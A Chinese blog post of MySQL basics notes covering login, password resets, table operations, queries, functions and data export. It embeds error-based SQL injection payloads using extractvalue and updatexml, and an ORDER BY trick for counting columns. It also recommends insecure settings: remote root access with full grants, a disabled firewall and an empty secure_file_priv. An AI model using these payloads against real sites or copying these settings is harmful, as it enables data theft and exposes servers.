<!DOCTYPE html>
<html lang="zh-Hans">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="数据库数据库即存储数据的仓库，是一个管理数据的软件
数据库模型
关系型数据库（也称结构化数据库）
MySQL：轻量级开源数据库，适用于中小型企业，性能较好
MSSQL(SQL server)：微软开发的，适用于中大型企业，需要微软系统作为支撑，不支持跨平台
Oracle：收费，适用于大型企业的需求，">
    

    <!--Author-->
    
        <meta name="author" content="xiaoli24680">
    

    <!-- Title -->
    
    <title>MySQL数据库基础知识笔记 | xiaoli24680&#39;s Blog</title>

    <!-- Bootstrap Core CSS -->
    <link href="//cdn.bootcss.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/style.css">

    <!-- Custom Fonts -->
    <link href="//cdn.bootcss.com/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">
    <link href="//fonts.googleapis.com/css?family=Noto+Serif:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">


    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
</head>

<body>

    <!-- Content -->
    <section class="article-container">
<!-- Back Home -->
<a class="nav-back" href="/">
    <i class="fa fa-puzzle-piece"></i>
</a>

<!-- Page Header -->
<header class="intro-header">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <h1>MySQL数据库基础知识笔记</h1>
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">
            <!-- Post Main Content -->
            <div class="post-content col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <h1 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h1><p>数据库即存储数据的仓库，是一个管理数据的软件</p>
<h5 id="数据库模型"><a href="#数据库模型" class="headerlink" title="数据库模型"></a>数据库模型</h5><ul>
<li>关系型数据库（也称结构化数据库）<ul>
<li>MySQL：轻量级开源数据库，适用于中小型企业，性能较好</li>
<li>MSSQL(SQL server)：微软开发的，适用于中大型企业，需要微软系统作为支撑，不支持跨平台</li>
<li>Oracle：收费，适用于大型企业的需求，支持跨平台，需要良好的硬件配置作为支撑</li>
<li>DB2</li>
<li>……</li>
</ul>
</li>
<li>非关系型数据库（也称非结构化数据库）<ul>
<li>redis、mongodb、Hbase、nosql等</li>
</ul>
</li>
</ul>
<h5 id="关系型数据库结构"><a href="#关系型数据库结构" class="headerlink" title="关系型数据库结构"></a>关系型数据库结构</h5><ol>
<li>数据库：可以看成是一个“文件柜”中的“小格子”</li>
<li>数据表：可以看成是一个具体的“文件”</li>
<li>记录、字段、数据<ul>
<li>一行，即一条记录</li>
<li>一列，即一个字段</li>
<li>行列交叉处，即数据</li>
</ul>
</li>
</ol>
<h1 id="MySQL登录和退出"><a href="#MySQL登录和退出" class="headerlink" title="MySQL登录和退出"></a>MySQL登录和退出</h1><p>登录MySQL有两种方式，一种是通过命令行登录进行操作，一种是通过工具登录进行操作，下面介绍通过DOS命令行进行登录</p>
<h2 id="配置环境变量"><a href="#配置环境变量" class="headerlink" title="配置环境变量"></a>配置环境变量</h2><p>如果想在任意位置登录MySQL，则需要配置环境变量，如何判断是否配置好，可通过查看MySQL版本的命令进行判断：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -V			#切记是大写的`V`</span><br></pre></td></tr></table></figure>
<p><img src="/mysql/mysql-V01.png" alt="数据库"></p>
<p>如果出现如下情况即没有配置好：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">‘mysql -V 不是内部或外部命令，也不是可运行的程序或批处理文件。</span><br></pre></td></tr></table></figure>
<p>接下来进行配置，win7路径如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">win7--&gt;计算机--&gt;属性--&gt;高级系统设置--&gt;高级--&gt;环境变量--&gt;系统变量--&gt;Path</span><br></pre></td></tr></table></figure>
<p>大差不差，网上教程很多，配一下就完事儿了，此处省略**字</p>
<h2 id="登录"><a href="#登录" class="headerlink" title="登录"></a>登录</h2><p>在DOS命令行中，执行以下命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -h 主机名 -u 用户名 -p 密码</span><br></pre></td></tr></table></figure>
<ul>
<li>-h：代表MySQL数据库主机名。本地主机名如：127.0.0.1。MySQL数据库默认端口号：3306</li>
<li>-u：代表MySQL用户名。如：root</li>
<li>-p：代表MySQL密码。如：root。在登录时，可以先不输入密码值</li>
</ul>
<p>如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -h127.0.0.1 -uroot -proot</span><br></pre></td></tr></table></figure>
<h2 id="退出"><a href="#退出" class="headerlink" title="退出"></a>退出</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exit</span><br></pre></td></tr></table></figure>
<h2 id="重置密码"><a href="#重置密码" class="headerlink" title="重置密码"></a>重置密码</h2><p>如果忘记密码，莫慌，老夫看你骨骼惊奇，这个重置密码的方法，就赐予你了：</p>
<h5 id="phpstudy重置数据库密码："><a href="#phpstudy重置数据库密码：" class="headerlink" title="phpstudy重置数据库密码："></a>phpstudy重置数据库密码：</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">其他选项菜单--&gt;mysql工具--&gt;重置密码</span><br></pre></td></tr></table></figure>
<h5 id="Linux（centos7）修改root密码："><a href="#Linux（centos7）修改root密码：" class="headerlink" title="Linux（centos7）修改root密码："></a>Linux（centos7）修改root密码：</h5><ul>
<li>MySQL版本低于8：</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">1.修改配置文件：vi /etc/my.cnf 	添加：skip-grant-tables	重启MySQL服务</span><br><span class="line"></span><br><span class="line">2.空密码登录： mysql -uroot</span><br><span class="line"></span><br><span class="line">3.改密码：</span><br><span class="line">update mysql.user set authentication_string=password(‘root&apos;),plugin=&apos;mysql_native_password&apos; where user=&apos;root&apos; and host=&apos;localhost&apos;;</span><br><span class="line"></span><br><span class="line">4.更新数据库：flush privileges;</span><br><span class="line"></span><br><span class="line">5.退出</span><br><span class="line"></span><br><span class="line">6.再次修改配置文件，注释掉skip-grant-tables，重启MySQL服务，即可</span><br></pre></td></tr></table></figure>
<ul>
<li>MySQL版本为8及以上：</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1.查看原始密码：(两种方法)</span><br><span class="line">    1).	grep &quot;password&quot; /var/log/mysqld.log</span><br><span class="line">    2).	cat /var/log/mysqld.log | grep &quot;password&quot;</span><br><span class="line">    </span><br><span class="line">2.使用原始密码登录：	mysql -uroot -p</span><br><span class="line"></span><br><span class="line">3.执行命令：		ALTER USER &quot;root&quot;@&quot;localhost&quot; IDENTIFIED BY &quot;你的密码&quot;;</span><br><span class="line"></span><br><span class="line">4.重启服务即可</span><br></pre></td></tr></table></figure>
<h2 id="允许外界连接的方法"><a href="#允许外界连接的方法" class="headerlink" title="允许外界连接的方法"></a>允许外界连接的方法</h2><ul>
<li><p>改表法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">进入MySQL，执行以下命令：</span><br><span class="line"></span><br><span class="line">首先要能远程访问，修改root的host为%</span><br><span class="line">update user set host=&apos;%&apos; where user=&apos;root&apos;;</span><br><span class="line">GRANT ALL ON *.* TO &apos;root&apos;@&apos;%&apos;;</span><br><span class="line"></span><br><span class="line">其次，修改连接方式：</span><br><span class="line">ALTER USER &apos;root&apos;@&apos;%&apos; IDENTIFIED WITH mysql_native_password BY &apos;你的数据库密码&apos;;</span><br><span class="line">注意修改防火墙规则或者关闭防火墙</span><br></pre></td></tr></table></figure>
</li>
<li><p>授权法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ubuntu上安装mysql只需要几条命令就可以完成。</span><br><span class="line">  sudo apt-get install mysql-server 注意：安装时需要设置root密码</span><br><span class="line">  apt-get install mysql-client</span><br><span class="line">  sudo apt-get install libmysqlclient-dev</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h1 id="数据类型"><a href="#数据类型" class="headerlink" title="数据类型"></a>数据类型</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">整型				INT</span><br><span class="line"></span><br><span class="line">浮点型			   FLOAT</span><br><span class="line"></span><br><span class="line">日期				DATE		YYYY-MM-DD</span><br><span class="line"></span><br><span class="line">时间				TIME		HH-MM-SS</span><br><span class="line"></span><br><span class="line">时间戳			   TIMESTAMP</span><br><span class="line"></span><br><span class="line">字符				CHAR</span><br><span class="line">				 VARCHAR</span><br><span class="line">				 </span><br><span class="line">文本				TEXT</span><br></pre></td></tr></table></figure>
<h1 id="MySQL数据库操作"><a href="#MySQL数据库操作" class="headerlink" title="MySQL数据库操作"></a>MySQL数据库操作</h1><p>在MySQL交互式环境中，所有命令必须以英文分号<code>;</code>结束</p>
<p>MySQL不区分大小写，但是把系统命令和自定义值以大小写区分会便于查看和排错</p>
<h2 id="显示数据库"><a href="#显示数据库" class="headerlink" title="显示数据库"></a>显示数据库</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SHOW DATABASES;</span><br></pre></td></tr></table></figure>
<h2 id="创建数据库"><a href="#创建数据库" class="headerlink" title="创建数据库"></a>创建数据库</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">交互式环境：		CREATE DATABASE [IF NOT EXISTS] 数据库名 [CHARSET UTF8];</span><br><span class="line">DOS命令行：		  mysqladmin -uroot -proot CREATE DATABASE 数据库名;</span><br></pre></td></tr></table></figure>
<ul>
<li>IF NOT EXISTS：可选项，如果不存在，则创建数据库</li>
<li>数据库名：自定义</li>
<li>CHARSET：设置数据库的默认字符集</li>
</ul>
<p><img src="/mysql/create_db01.png" alt="数据库"></p>
<h2 id="删除数据库"><a href="#删除数据库" class="headerlink" title="删除数据库"></a>删除数据库</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DROP DATABASE [IF EXISTS] 数据库名;</span><br></pre></td></tr></table></figure>
<h2 id="查看数据库的字符集"><a href="#查看数据库的字符集" class="headerlink" title="查看数据库的字符集"></a>查看数据库的字符集</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SHOW CREATE DATABASE 数据库名;</span><br></pre></td></tr></table></figure>
<p><img src="/mysql/charset01.png" alt="数据库"></p>
<p>通过MySQL命令修改数据库的字符集</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ALTER DATABASE 数据库名 DEFAULT CHARACTER SET gbk;</span><br></pre></td></tr></table></figure>
<p><img src="/mysql/charset02.png" alt="数据库"></p>
<h1 id="MySQL数据表操作"><a href="#MySQL数据表操作" class="headerlink" title="MySQL数据表操作"></a>MySQL数据表操作</h1><h2 id="选择数据库"><a href="#选择数据库" class="headerlink" title="选择数据库"></a>选择数据库</h2><p>只有进入数据库里，才能操作数据表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">USE 数据库名;</span><br></pre></td></tr></table></figure>
<h2 id="显示当前库中所有的数据表"><a href="#显示当前库中所有的数据表" class="headerlink" title="显示当前库中所有的数据表"></a>显示当前库中所有的数据表</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SHOW TABLES;</span><br></pre></td></tr></table></figure>
<h2 id="创建数据表"><a href="#创建数据表" class="headerlink" title="创建数据表"></a>创建数据表</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CREATE TABLE 表名(字段1 字段1类型 字段1属性,字段2 字段2类型 字段2属性,……)</span><br></pre></td></tr></table></figure>
<ul>
<li>字段类型：tinyint、int、bigint、char、varchar、text、date、time等</li>
<li>字段属性：<ul>
<li>NOT NULL|NULL：是否可以为空</li>
<li>DEFAULT default_value：指该列的默认值<ul>
<li>default_value默认值可以是字符串，也可以是整型</li>
</ul>
</li>
<li>AUTO_INCREMENT：该列为自动增长型，或者自动编号。要求该列必须是整型。<strong>一个表只能有一个auto_increment属性</strong>。</li>
<li>PRIMARY KEY：主键。指定该列的值具有唯一性，主键所在的列不能为空。<strong>一个表的主键只能有一个</strong>。</li>
</ul>
</li>
</ul>
<p>一个数据表，由多个列构成。多个列定义之间用英文下的<strong>逗号</strong>隔开。</p>
<p><img src="/mysql/create_tb01.png" alt="数据库"></p>
<p><img src="/mysql/create_tb02.png" alt="数据库"></p>
<h2 id="删除数据表"><a href="#删除数据表" class="headerlink" title="删除数据表"></a>删除数据表</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DROP TABLE [IF EXISTS] table_name;</span><br></pre></td></tr></table></figure>
<h2 id="修改数据表"><a href="#修改数据表" class="headerlink" title="修改数据表"></a>修改数据表</h2><p><img src="/mysql/alter_tb01.png" alt="数据库"></p>
<h2 id="describe显示表的结构定义"><a href="#describe显示表的结构定义" class="headerlink" title="describe显示表的结构定义"></a>describe显示表的结构定义</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DESCRIBE 表名;	或		DESC 表名;</span><br></pre></td></tr></table></figure>
<p><img src="/mysql/desc01.png" alt="数据库"></p>
<h1 id="SQL基础"><a href="#SQL基础" class="headerlink" title="SQL基础"></a>SQL基础</h1><h2 id="增删改查"><a href="#增删改查" class="headerlink" title="增删改查"></a>增删改查</h2><h3 id="增加记录"><a href="#增加记录" class="headerlink" title="增加记录"></a>增加记录</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO 表名(字段1,字段2,字段3,…) VALUES (值1,值2,值3,…)</span><br></pre></td></tr></table></figure>
<h3 id="删除记录"><a href="#删除记录" class="headerlink" title="删除记录"></a>删除记录</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DELETE FROM 表名 [WHERE 条件]</span><br></pre></td></tr></table></figure>
<p><strong>WHERE条件：如果省略，将删除所有记录</strong></p>
<h3 id="修改记录"><a href="#修改记录" class="headerlink" title="修改记录"></a>修改记录</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UPDATE 表名 SET 字段1 = 新值1，字段2=新值2,… [WHERE条件]</span><br></pre></td></tr></table></figure>
<ul>
<li><p>需要更新的字段列出，不需要更新的不用管它</p>
</li>
<li><p>字段的顺序可以修改</p>
</li>
<li>WHERE条件不能省略，如果省略，所有记录都会修改</li>
</ul>
<h3 id="查询记录"><a href="#查询记录" class="headerlink" title="查询记录"></a>查询记录</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT 字段列表|* FROM 表名 [WHERE条件] [ORDER BY排序][LIMIT限制输出]</span><br></pre></td></tr></table></figure>
<ul>
<li>字段字列表：查询某些字段的数据，各字段之间用逗号隔开，字段之间没有顺序</li>
<li><em>：表示显示所有列的数据。如：select </em> from news;</li>
<li>where：指查询的条件</li>
<li>ORDER BY：字段排序</li>
<li>LIMIT：限制输出</li>
</ul>
<h2 id="条件判断"><a href="#条件判断" class="headerlink" title="条件判断"></a>条件判断</h2><h3 id="WHERE"><a href="#WHERE" class="headerlink" title="WHERE"></a>WHERE</h3><p><img src="/mysql/where01.png" alt="数据库"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM news WHERE id&lt;100;</span><br><span class="line">SELECT * FROM news WHERE id&lt;100 and hits&lt;100;</span><br><span class="line">SELECT * FROM news WHERE id=100 OR hits&lt;50;</span><br></pre></td></tr></table></figure>
<h3 id="ORDER-BY"><a href="#ORDER-BY" class="headerlink" title="ORDER BY"></a>ORDER BY</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">order by n		如果后面跟数字，是按照第n列数据排序，如果n超过字段数，就报错</span><br><span class="line"></span><br><span class="line">ERROR 1054 (42S22): Unknown column &apos;5&apos; in &apos;order clause&apos;</span><br></pre></td></tr></table></figure>
<p><strong>由此可判断此表有几列</strong></p>
<h3 id="LIMIT-限制输出"><a href="#LIMIT-限制输出" class="headerlink" title="LIMIT  限制输出"></a>LIMIT  限制输出</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">LIMIT startrow,pagesize;</span><br></pre></td></tr></table></figure>
<ul>
<li><p>startrow从指定的行数起，开始返回数据</p>
</li>
<li><p>pagesize返回的记录数</p>
</li>
<li><p>举例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">LIMIT 0,10;  //从第0行起，返回10条记录</span><br><span class="line">LIMIT 10,10;  //从第10行起，返回10条记录</span><br><span class="line">LIMIT 20,10;  //从第20行起，返回10条记录</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="LIKE"><a href="#LIKE" class="headerlink" title="LIKE"></a>LIKE</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">通配符：</span><br><span class="line">	*		表示任意的字符</span><br><span class="line">	%		表示任意的字符</span><br><span class="line">	？	   表示一个字符</span><br><span class="line">SELECT * FROM 表名 WHERE 字段名 LIKE &apos;字符串&apos;;		其中字符串可用通配符</span><br></pre></td></tr></table></figure>
<h3 id="UNION-联合查询"><a href="#UNION-联合查询" class="headerlink" title="UNION  联合查询"></a>UNION  联合查询</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT 字段列表|* FROM 表1 UNION SELECT 字段列表|* FROM 表2;</span><br></pre></td></tr></table></figure>
<p><strong>表1和表2中字段数应相同</strong></p>
<h3 id="DISTINCT-去重"><a href="#DISTINCT-去重" class="headerlink" title="DISTINCT  去重"></a>DISTINCT  去重</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT  DISTINCT field FROM table_name [WHERE 条件]；</span><br></pre></td></tr></table></figure>
<h3 id="GROUP-CONCAT-把查询结果链接一起"><a href="#GROUP-CONCAT-把查询结果链接一起" class="headerlink" title="GROUP_CONCAT  把查询结果链接一起"></a>GROUP_CONCAT  把查询结果链接一起</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT  group_concat(DISTINCT field) FROM table_name [WHERE 条件] ；</span><br></pre></td></tr></table></figure>
<h1 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h1><ul>
<li>数据库信息类</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">version()  		显示数据库版本信息</span><br><span class="line"></span><br><span class="line">connection_id()	显示当前连接数</span><br><span class="line"></span><br><span class="line">user()   		当前用户（current_user()、system_user()、session_user()）</span><br><span class="line"></span><br><span class="line">database()  	查看当前使用的数据库</span><br><span class="line"></span><br><span class="line">schema()  		查看当前使用的数据库</span><br><span class="line"></span><br><span class="line">@@hostname  	获取当前计算机名称</span><br><span class="line"></span><br><span class="line">@@tmpdir 		存放临时文件的路径</span><br><span class="line"></span><br><span class="line">@@datadir		存放数据的路径</span><br><span class="line"></span><br><span class="line">@@version		数据库版本</span><br><span class="line"></span><br><span class="line">@@basedir		数据库所在位置</span><br></pre></td></tr></table></figure>
<ul>
<li>字符串操作类</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">mid(string,start,length)  			 用来截取字符串中一部分</span><br><span class="line"></span><br><span class="line">SUBSTRING（str,start,length）			把str从start个字符开始截取length个字符，并输出</span><br><span class="line"></span><br><span class="line">ord()  								 用来显示字符的ASCII码</span><br><span class="line"></span><br><span class="line">concat()  							 拼接字符串</span><br><span class="line"></span><br><span class="line">concat_ws()  						 使用分隔符来拼接字符串</span><br><span class="line">第一个参数是分隔符，支持16进制，不能用单双引号包括</span><br><span class="line">  </span><br><span class="line">group_concat()  					 和concat类似，拼接并分组显示数据</span><br><span class="line"></span><br><span class="line">INSERT(str1,start,length,str2)		 把str1的第start个字符往后的length个字符替换为str2	</span><br><span class="line"></span><br><span class="line">LEFT(str,length)					 把str从左边开始截取length个字符并输出</span><br><span class="line"></span><br><span class="line">RIGHT(str,length)					 把str从右边开始截取length个字符并输出</span><br></pre></td></tr></table></figure>
<ul>
<li>其他</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SLEEP(5)			让服务器等待5秒后返回0</span><br></pre></td></tr></table></figure>
<ul>
<li>报错函数</li>
</ul>
<p><strong>extractvalue</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">extractvalue(XML_document，XPath_string):</span><br><span class="line">	第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc </span><br><span class="line">	第二个参数：XPath_string (Xpath格式的字符串)</span><br><span class="line">	作用：从目标XML中返回包含所查询值的字符串</span><br><span class="line">	select * from news where tid=1 and extractvalue(1,concat(0x7e,(select user()),0x7e));</span><br></pre></td></tr></table></figure>
<p><strong>UPDATEXML</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">UPDATEXML (XML_document, XPath_string, new_value); </span><br><span class="line">	第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc </span><br><span class="line">	第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。 </span><br><span class="line">	第三个参数：new_value，String格式，替换查找到的符合条件的数据 </span><br><span class="line">	作用：改变文档中符合条件的节点的值</span><br><span class="line">	select * from news where tid=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));</span><br></pre></td></tr></table></figure>
<h1 id="导入导出数据"><a href="#导入导出数据" class="headerlink" title="导入导出数据"></a>导入导出数据</h1><h2 id="导入数据"><a href="#导入数据" class="headerlink" title="导入数据"></a>导入数据</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1.mysql命令导入			mysql -uroot -proot &lt; 文件路径</span><br><span class="line"></span><br><span class="line">2.source命令导入</span><br><span class="line"></span><br><span class="line">3.使用 LOAD DATA 导入数据</span><br></pre></td></tr></table></figure>
<h2 id="导出数据"><a href="#导出数据" class="headerlink" title="导出数据"></a>导出数据</h2><ul>
<li>第一种方法</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM 表名 INTO OUTFILE &quot;路径+文件名&quot;;</span><br></pre></td></tr></table></figure>
<p>如果出错，以下为解决办法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv opti</span><br><span class="line">on so it cannot execute this statement</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">执行命令（查看相关配置）：</span><br><span class="line">SHOW GLOBAL VARIABLES LIKE &apos;%secure_file_priv%&apos;;</span><br><span class="line"></span><br><span class="line">secure_file_priv 为 NULL 时，表示限制mysqld不允许导入或导出。</span><br><span class="line"></span><br><span class="line">secure_file_priv 为 /tmp （路径）时，表示限制mysqld只能在/tmp目录（路径）中执行导入导出，其他目录不能执行。</span><br><span class="line"></span><br><span class="line">secure_file_priv 没有值时，表示不限制mysqld在任意目录的导入导出。</span><br><span class="line"></span><br><span class="line">永久解决办法：</span><br><span class="line">	修改配置文件my.ini，添加如下语句：</span><br><span class="line">	secure_file_priv=			//表示可导入导出到任意目录</span><br><span class="line">	</span><br><span class="line">临时解决办法：</span><br><span class="line">	set global secure_file_priv=&apos;&apos;;</span><br></pre></td></tr></table></figure>
<ul>
<li>第二种方法</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mysqldump -uroot -p db_name &gt; ./db_name.sql	在DOS命令下运行</span><br><span class="line"></span><br><span class="line">mysqldump -u 用户名 -p 数据库名 &gt; 导出的文件名</span><br><span class="line"></span><br><span class="line">mysqldump -u 用户名 -p 数据库名 表名 &gt; 导出的文件名</span><br></pre></td></tr></table></figure>
